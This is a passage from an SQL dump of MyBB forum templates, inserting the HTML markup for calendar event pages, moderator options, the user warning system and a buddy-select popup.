value=\"8\"{$repeats_5_month2[\'8\']}>{$lang->month_8}</option> <option value=\"9\"{$repeats_5_month2[\'9\']}>{$lang->month_9}</option> <option value=\"10\"{$repeats_5_month2[\'10\']}>{$lang->month_10}</option> <option value=\"11\"{$repeats_5_month2[\'11\']}>{$lang->month_11}</option> <option value=\"12\"{$repeats_5_month2[\'12\']}>{$lang->month_12}</option> </select> {$lang->every} <input type=\"text\" class=\"textbox\" name=\"repeats_5_years2\" value=\"{$repeats_5_years}\" size=\"2\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" /> {$lang->year_or_years} </div> </div> </td> </tr> </table> </dd> </dl> <script type=\"text/javascript\"> <!-- toggleType(); toggleRepeats(); // --> </script> </td> </tr> <tr> <td valign=\"top\" width=\"20%\" class=\"trow1\"><strong>{$lang->event_details}</strong>{$smilieinserter}</td> <td class=\"trow1\"><textarea name=\"description\" id=\"message\" rows=\"20\" cols=\"70\">{$description}</textarea> {$codebuttons}</td> </tr> <tr> <td width=\"20%\" class=\"trow2\"><strong>{$lang->event_options}</strong></td> <td class=\"trow2\"> <input type=\"checkbox\" class=\"checkbox\" name=\"private\" value=\"1\"{$privatecheck} /><span class=\"smalltext\">{$lang->private_option}</span><br /> </td> </tr> </table> <br /> <input type=\"hidden\" name=\"action\" value=\"do_editevent\" /> <input type=\"hidden\" name=\"eid\" value=\"{$event[\'eid\']}\" /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->edit_event}\" /></div> </form> {$footer} </body> </html>', '-2', '1402', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('488', 'calendar_move', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->calendar} - {$lang->move_event}</title> {$headerinclude} </head> <body> {$header} <form action=\"calendar.php\" method=\"post\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\"> <tr> <td colspan=\"2\" width=\"100%\" class=\"thead\"><strong>{$lang->move_event}: {$event[\'name\']}</strong></td> </tr> <tr> <td width=\"20%\" class=\"trow1\"><strong>{$lang->move_to_calendar}:</strong></td> <td class=\"trow1\"> <select name=\"new_calendar\"> {$calendar_select} </select> </td> </tr> </table> <br /> <input type=\"hidden\" name=\"action\" value=\"do_move\" /> <input type=\"hidden\" name=\"eid\" value=\"{$event[\'eid\']}\" /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->move_event}\" /></div> </form> {$footer} </body> </html>', '-2', '1402', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('489', 'calendar_event', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->calendar} - {$event[\'name\']}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$event[\'name\']}</strong></td> </tr> <tr> <td class=\"tcat\"><strong>{$time_period}</strong></td> </tr> <tr> <td class=\"trow1{$event_class}\"> <div style=\"float: left;\"> <strong><span class=\"largetext\">{$event[\'profilelink\']}</span></strong><br /> <span class=\"smalltext\"> {$event[\'usertitle\']}<br /> {$event[\'userstars\']} </span> </div> <div style=\"float: right; text-align: right;\"> {$moderator_options} {$repeats} </div> <br style=\"clear: both;\" /> </td> </tr> <tr> <td class=\"trow2{$event_class}\"> <p>{$event[\'description\']}</p> {$edit_event} </td> </tr> </table> <br /> <form action=\"calendar.php\" method=\"post\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\"> <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"> <tr> <td class=\"trow1\" valign=\"top\">{$addevent}</td> <td class=\"trow1\" align=\"right\"> <span class=\"smalltext\"><strong>{$lang->jump_month}</strong></span> <select name=\"month\"> <option value=\"{$month}\">{$monthnames[$month]}</option> <option value=\"{$week_from[1]}\">----------</option> <option value=\"1\">{$lang->alt_month_1}</option> <option value=\"2\">{$lang->alt_month_2}</option> <option value=\"3\">{$lang->alt_month_3}</option> <option value=\"4\">{$lang->alt_month_4}</option> <option value=\"5\">{$lang->alt_month_5}</option> <option value=\"6\">{$lang->alt_month_6}</option> <option value=\"7\">{$lang->alt_month_7}</option> <option value=\"8\">{$lang->alt_month_8}</option> <option value=\"9\">{$lang->alt_month_9}</option> <option value=\"10\">{$lang->alt_month_10}</option> <option value=\"11\">{$lang->alt_month_11}</option> <option value=\"12\">{$lang->alt_month_12}</option> </select> <select name=\"year\"> {$yearsel} </select> {$gobutton} <br /><br /> <span class=\"smalltext\"><strong>{$lang->jump_to_calendar}</strong></span> {$calendar_jump} {$gobutton} </td> </tr> </table> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('490', 'calendar_event_modoptions', ' <form method=\"post\" action=\"calendar.php\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"eid\" value=\"{$event[\'eid\']}\"> <select name=\"action\" onchange=\"if(this.options[this.selectedIndex].value != \'\') { window.location=(\'calendar.php?action=\'+this.options[this.selectedIndex].value+\'&amp;eid={$event[\'eid\']}&amp;my_post_key={$mybb->post_code}\') }\"> <option value=\"\" style=\"font-weight: bold;\">{$lang->moderator_options}</option> <option value=\"{$approve_value}\">{$approve}</option> <option value=\"move\">{$lang->move_event}</option> </select> {$gobutton} </form> <br />', '-2', '1604', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('491', 'calendar_dayview', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->calendar}</title> {$headerinclude} </head> <body> {$header} {$birthdays} {$events} <br /> <form action=\"calendar.php\" method=\"post\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\"> <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"> <tr> <td class=\"trow1\" valign=\"top\">{$addevent}</td> <td class=\"trow1\" align=\"right\"> <span class=\"smalltext\"><strong>{$lang->jump_month}</strong></span> <select name=\"month\"> <option value=\"{$month}\">{$monthnames[$month]}</option> <option value=\"{$month}\">----------</option> <option value=\"1\">{$lang->alt_month_1}</option> <option value=\"2\">{$lang->alt_month_2}</option> <option value=\"3\">{$lang->alt_month_3}</option> <option value=\"4\">{$lang->alt_month_4}</option> <option value=\"5\">{$lang->alt_month_5}</option> <option value=\"6\">{$lang->alt_month_6}</option> <option value=\"7\">{$lang->alt_month_7}</option> <option value=\"8\">{$lang->alt_month_8}</option> <option value=\"9\">{$lang->alt_month_9}</option> <option value=\"10\">{$lang->alt_month_10}</option> <option value=\"11\">{$lang->alt_month_11}</option> <option value=\"12\">{$lang->alt_month_12}</option> </select> <select name=\"year\"> <option value=\"{$year}\">{$year}</option> <option value=\"{$year}\">----------</option> {$yearsel} </select> {$gobutton} <br /><br /> <span class=\"smalltext\"><strong>{$lang->jump_to_calendar}</strong></span> {$calendar_jump} {$gobutton} </td> </tr> </table> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1405', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('492', 'calendar_dayview_event', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$event[\'name\']}</strong></td> </tr> <tr> <td class=\"tcat\"><strong>{$time_period}</strong></td> </tr> <tr> <td class=\"trow1{$event_class}\"> <div style=\"float: left;\"> <strong><span class=\"largetext\">{$event[\'profilelink\']}</span></strong><br /> <span class=\"smalltext\"> {$event[\'usertitle\']}<br /> {$event[\'userstars\']} </span> </div> <div style=\"float: right; text-align: right;\"> {$moderator_options} {$repeats} </div> <br style=\"clear: both;\" /> </td> </tr> <tr> <td class=\"trow2{$event_class}\"> <p>{$event[\'description\']}</p> {$edit_event} </td> </tr> </table> <br /> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('493', 'calendar_event_editbutton', '<div style=\"text-align: right; vertical-align: bottom;\"> <a href=\"calendar.php?action=editevent&amp;eid={$event[\'eid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_edit.gif\" border=\"0\" alt=\"{$lang->alt_edit}\" title=\"{$lang->alt_edit}\" /></a> <a href=\"javascript:MyBB.deleteEvent({$event[\'eid\']});\"><img src=\"{$theme[\'imglangdir\']}/postbit_delete.gif\" border=\"0\" alt=\"{$lang->alt_delete}\" title=\"{$lang->alt_delete}\" /></a> </div> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('494', 'calendar_dayview_birthdays', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->birthdays_on_day}</strong></td> </tr> <tr> <td class=\"trow1\"><span class=\"smalltext\">{$birthday_list}</span></td> </tr> </table> <br /> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('495', 'calendar_dayview_birthdays_bday', '{$comma}{$birthday[\'profilelink\']}{$age}', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('496', 'warnings', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->warning_log}</title> {$headerinclude} </head> <body> {$header} {$multipage} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <thead> <tr> <td class=\"thead\" colspan=\"5\"> <div class=\"float_right\">{$lang->current_warning_level}</div> <div><strong>{$lang->warning_log}</strong></div> </td> </tr> <tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->warning}</strong></span></td> <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->date_issued}</strong></span></td> <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->expiry_date}</strong></span></td> <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->issued_by}</strong></span></td> <td class=\"tcat\" width=\"1\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->details}</strong></span></td> </tr> </thead> <tbody> {$warnings} </tbody> </table> {$multipage} {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('497', 'warnings_warning', ' <tr> <td class=\"{$alt_bg}\">{$warning_type} {$points}{$post_link}</td> <td class=\"{$alt_bg}\" align=\"center\">{$date_issued}</td> <td class=\"{$alt_bg}\" align=\"center\">{$expires}</td> <td class=\"{$alt_bg}\" align=\"center\">{$issuedby}</td> <td class=\"{$alt_bg}\" align=\"center\"><a href=\"warnings.php?action=view&amp;wid={$warning[\'wid\']}\">{$lang->view}</a></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('498', 'warnings_active_header', ' <tr> <td class=\"trow_sep\" colspan=\"5\">{$lang->active_warnings}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('499', 'warnings_expired_header', ' <tr> <td class=\"trow_sep\" colspan=\"5\">{$lang->expired_warnings}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('500', 'warnings_no_warnings', ' <tr> <td class=\"trow1\" colspan=\"5\" align=\"center\">{$lang->no_warnings}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('501', 'warnings_warn_existing', ' <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <thead> <tr> <td class=\"thead\" colspan=\"5\"> <div><strong>{$lang->existing_post_warnings}</strong></div> </td> </tr> <tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->warning}</strong></span></td> <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->date_issued}</strong></span></td> <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->expiry_date}</strong></span></td> <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->issued_by}</strong></span></td> <td class=\"tcat\" width=\"1\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->details}</strong></span></td> </tr> </thead> <tbody> {$warnings} </tbody> </table><br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('502', 'warnings_warn', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->warn_user}</title> {$headerinclude} </head> <body> {$header} {$existing_warnings} {$warn_errors} <form action=\"warnings.php\" method=\"post\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_warn\" /> <input type=\"hidden\" name=\"uid\" value=\"{$user[\'uid\']}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\"> <tr> <td colspan=\"2\" width=\"100%\" class=\"thead\"><strong>{$lang->warn_user}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->warn_user_desc}</strong></span></td> </tr> <tr> <td width=\"20%\" class=\"trow1\"><strong>{$lang->username}</strong></td> <td class=\"trow1\">{$user_link}</td> </tr> {$post} <tr> <td width=\"20%\" class=\"trow1\" valign=\"top\"><strong>{$lang->warning_note}</strong></td> <td class=\"trow1\"><textarea name=\"notes\" cols=\"60\" rows=\"4\">{$notes}</textarea></td> </tr> <tr> <td width=\"20%\" class=\"trow2\" valign=\"top\"><strong>{$lang->warning_type}</strong></td> <td class=\"trow2\"> <script type=\"text/javascript\"> // <!-- function checkType() { var checked = \'\'; $$(\'.types_check\').each(function(e) { if(e.checked == true) { checked = e.value; } }); $$(\'.types\').each(function(e) { Element.hide(e); }); if($(\'type_\'+checked)) { Element.show(\'type_\'+checked); } } // --> </script> <dl style=\"margin-top: 0; margin-bottom: 0; width: 100%;\"> {$types} {$custom_warning} </dl> <script type=\"text/javascript\"> // <!-- checkType(); // --> </script> </td> </tr> {$pm_notify} </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->warn_user}\" /></div> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('503', 'warnings_warn_type', ' <dt><label style=\"display: block;\"><input type=\"radio\" name=\"type\" value=\"{$type[\'tid\']}\" {$checked} class=\"types_check\" onclick=\"checkType();\" style=\"vertical-align: middle;\" /> <strong>{$type[\'title\']}</strong> {$points}</label></dt> <dd style=\"margin-top: 4px;\" id=\"type_{$type[\'tid\']}\" class=\"types\"> <div class=\"smalltext\">{$lang->new_warning_level}</div> <div class=\"tborder\" style=\"width: 150px; float: left; margin: 0; padding: 1px;\"> <div class=\"trow1\" style=\"width: {$current_level}%; float: left; \">&nbsp;</div> <div class=\"trow2\" style=\"width: {$level_diff}%; float: left;\">&nbsp;</div> </div> <div style=\"padding-left: 10px; font-weight: bold; float: left;\">{$new_warning_level}%</div><br style=\"clear: left;\" /> {$result} </dd>', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('504', 'warnings_warn_custom', ' <dt><label style=\"display: block;\"><input type=\"radio\" name=\"type\" value=\"custom\" {$type_checked[\'custom\']} class=\"types_check\" onclick=\"checkType();\" style=\"vertical-align: middle;\" /> <strong>{$lang->custom}</strong></label></dt> <dd style=\"margin-top: 4px;\" id=\"type_custom\" class=\"types\"> <table> <tr> <td class=\"smalltext\">{$lang->reason}</td> <td class=\"smalltext\">{$lang->points}</td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"custom_reason\" size=\"50\" maxlength=\"120\" value=\"{$custom_reason}\" /></td> <td><input type=\"text\" class=\"textbox\" name=\"custom_points\" size=\"2\" value=\"{$custom_points}\" /></td> </tr> <tr> <td class=\"smalltext\" colspan=\"2\" style=\"padding-top: 4px;\">{$lang->expires}</td> </tr> <tr> <td colspan=\"2\"> <input type=\"text\" class=\"textbox\" name=\"expires\" size=\"2\" value=\"{$expires}\" /> <select name=\"expires_period\"> <option value=\"hours\" {$expires_period[\'hours\']}>{$lang->hour_or_hours}</option> <option value=\"days\" {$expires_period[\'days\']}>{$lang->day_or_days}</option> <option value=\"weeks\" {$expires_period[\'weeks\']}>{$lang->week_or_weeks}</option> <option value=\"months\" {$expires_period[\'months\']}>{$lang->month_or_months}</option> <option value=\"never\" {$expires_period[\'never\']}>{$lang->never}</option> </select> </td> </tr> </table> </dd>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('505', 'warnings_warn_pm', ' <tr> <td width=\"20%\" class=\"trow1\" valign=\"top\"> <strong>{$lang->send_pm}</strong> <div style=\"margin:auto\" id=\"pm_smilie_insert\">{$smilieinserter}</div> </td> <td class=\"trow1\"> <script type=\"text/javascript\"> // <!-- var mybb_editor_disabled = true; var clickableEditor = \'\'; function togglePM() { if($(\'send_pm\').checked == true) { $(\'pm_input\').show(); $(\'pm_smilie_insert\').show(); if(mybb_editor_disabled == true && editor_language) { mybb_editor_disabled = false; clickableEditor = new messageEditor(\"message\", {lang: editor_language, rtl: {$lang->settings[\'rtl\']}, theme: \"{$theme[\'editortheme\']}\"}); if(clickableEditor) { clickableEditor.bindSmilieInserter(\"clickable_smilies\"); } } } else { $(\'pm_input\').hide(); $(\'pm_smilie_insert\').hide(); } } // --> </script> <label style=\"display: block;\"><input type=\"checkbox\" class=\"checkbox\" value=\"1\" name=\"send_pm\" id=\"send_pm\" onclick=\"togglePM();\" style=\"vertical-align: middle;\" {$send_pm_checked} /> {$lang->send_user_warning_pm}</label> <table id=\"pm_input\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><strong>{$lang->send_pm_subject}</strong></td> <td><input type=\"text\" class=\"textbox\" name=\"pm_subject\" size=\"40\" maxlength=\"85\" value=\"{$pm_subject}\" /></td> </tr> <tr> <td valign=\"top\"><strong>{$lang->send_pm_message}</strong></td> <td><textarea name=\"pm_message\" id=\"message\" rows=\"20\" cols=\"70\">{$message}</textarea> {$codebuttons}</td> </tr> </table> <script type=\"text/javascript\"> <!-- togglePM(); // --> </script> </td> </tr>', '-2', '1402', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('506', 'warnings_warn_post', ' <tr> <td width=\"20%\" class=\"trow2\"><strong>{$lang->post}</strong></td> <td class=\"trow2\"><input type=\"hidden\" name=\"pid\" value=\"{$post[\'pid\']}\" /><a href=\"{$post_link}\">{$post[\'subject\']}</a></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('507', 'usercp_warnings', ' <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <thead> <tr> <td class=\"thead\" colspan=\"4\"> <div class=\"float_right\">{$lang->current_warning_level}</div> <div><strong>{$lang->latest_warnings}</strong></div> </td> </tr> <tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->warning}</strong></span></td> <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->date_issued}</strong></span></td> <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->expiry_date}</strong></span></td> <td class=\"tcat\" width=\"20%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->issued_by}</strong></span></td> </tr> </thead> <tbody> {$warnings} </tbody> </table> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('508', 'usercp_warnings_warning', ' <tr> <td class=\"{$alt_bg}\">{$warning_type} {$points}{$post_link}</td> <td class=\"{$alt_bg}\" align=\"center\">{$date_issued}</td> <td class=\"{$alt_bg}\" align=\"center\">{$expires}</td> <td class=\"{$alt_bg}\" align=\"center\">{$issuedby}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('509', 'postbit_warninglevel', '<br />{$lang->postbit_warning_level} <a href=\"{$warning_link}\">{$warning_level}</a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('510', 'postbit_warn', '<a href=\"warnings.php?action=warn&amp;uid={$post[\'uid\']}&amp;pid={$post[\'pid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_warn.gif\" alt=\"{$lang->postbit_warn}\" title=\"{$lang->postbit_warn}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('511', 'member_profile_referrals', '<tr> <td class=\"{$bg_color}\"><strong>{$lang->members_referred}</strong></td> <td class=\"{$bg_color}\">{$memprofile[\'referrals\']}</td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('512', 'member_profile_warninglevel', '<tr> <td class=\"{$bg_color}\"><strong>{$lang->warning_level}</strong></td> <td class=\"{$bg_color}\"><a href=\"{$warning_link}\">{$warning_level}</a> {$warn_user}</td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('513', 'member_profile_warn', '[<a href=\"warnings.php?action=warn&amp;uid={$memprofile[\'uid\']}\">{$lang->warn}</a>]', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('514', 'warnings_view', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->warning_log}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"> <div class=\"float_right\">{$status}</div> <div><strong>{$lang->warning_details}</strong></div> </td> </tr> {$warning_info} <tr> <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->warning}</strong></span></td> <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->date_issued}<strong></span></td> </tr> <tr> <td class=\"trow2\">{$warning_type} {$points}</td> <td class=\"trow2\">{$date_issued}</td> </tr> <tr> <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->issued_by}</strong></span></td> <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->expiry_date}<strong></span></td> </tr> <tr> <td class=\"trow1\">{$issuedby}</td> <td class=\"trow1\">{$expires} {$revoked_date}</td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->warning_note}</strong></span></td> </tr> <tr> <td class=\"trow2\" colspan=\"2\">{$notes}</td> </tr> </table> {$revoke} {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('515', 'warnings_view_post', ' <tr> <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td> <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->post}<strong></span></td> </tr> <tr> <td class=\"trow1\">{$user_link}</td> <td class=\"trow1\"><a href=\"{$post_link}\">{$warning[\'post_subject\']}</a></td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('516', 'warnings_view_user', ' <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td> </tr> <tr> <td class=\"trow1\" colspan=\"2\">{$user_link}</td> </tr> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('517', 'warnings_view_revoke', '<br /> {$warn_errors} <form action=\"warnings.php\" method=\"post\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_revoke\" /> <input type=\"hidden\" name=\"wid\" value=\"{$warning[\'wid\']}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->revoke_warning}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->revoke_warning_desc}</strong></span></td> </tr> <tr> <td class=\"trow1\" width=\"20%\" valign=\"top\"><strong>{$lang->reason}</strong></td> <td class=\"trow1\"><textarea name=\"reason\" cols=\"60\" rows=\"4\"></textarea></td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->revoke_warning}\" /></div> </form>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('518', 'warnings_view_revoked', '<br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->warning_is_revoked}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->revoked_by}</strong></span></td> <td class=\"tcat\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->date_revoked}</strong></span></td> </tr> <tr> <td class=\"trow1\">{$revoked_by}</td> <td class=\"trow1\">{$date_revoked}</td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->reason}</strong></span></td> </tr> <tr> <td class=\"trow2\" colspan=\"2\">{$revoke_reason}</td> </tr> </table>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('519', 'xmlhttp_buddyselect', '<table border=\"0\" cellspacing=\"1\" cellpadding=\"4\" class=\"tborder\" style=\"width: 300px;\"> <thead> <tr> <td class=\"thead\"> <div class=\"float_right\" style=\"margin-top: 3px;\"><span class=\"smalltext\"><a href=\"#\" onclick=\"UserCP.closeBuddySelect(true); return false;\">{$lang->close}</a></span></div> <div><strong>{$lang->select_buddies}</strong></div> </td> </tr> </thead> <tbody> <tr> <td class=\"trow1 smalltext\">{$lang->select_buddies_desc}</td> </tr> <tr> <td class=\"trow2\"> <div style=\"height: 200px; overflow: auto;\" > <table border=\"0\" cellspacing=\"1\" cellpadding=\"4\" class=\"tborder\" style=\"border: 0; width: 270px;\" align=\"right\"> {$online} {$offline} </table> </div> </td> </tr> <tr> <td class=\"trow1\"> <div class=\"smalltext\"><strong>{$lang->selected_recipients}</strong></div> <div id=\"buddyselect_buddies\" class=\"smalltext\" style=\"padding-left: 10px; height: 50px; overflow: auto;\"></div> <div style=\"text-align: right;\"><input type=\"button\" class=\"button\" value=\"{$lang->ok}\" onclick=\"UserCP.closeBuddySelect();\" /> <input type=\"button\" class=\"button\" value=\"{$lang->cancel}\" onclick=\"UserCP.closeBuddySelect(true);\" /></div> </td> </tr> </tbody> </table>', '-2', '1405', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('520', 'xmlhttp_buddyselect_online', ' <tr> <td class=\"trow1\" onmouseover=\"this.className=\'trow2\';\" onmouseout=\"this.className=\'trow1\';\"><label><input type=\"checkbox\" style=\"vertical-align: middle;\" id=\"checkbox_{$buddy[\'uid\']}\" onclick=\"UserCP.selectBuddy(\'{$buddy[\'uid\']}\', 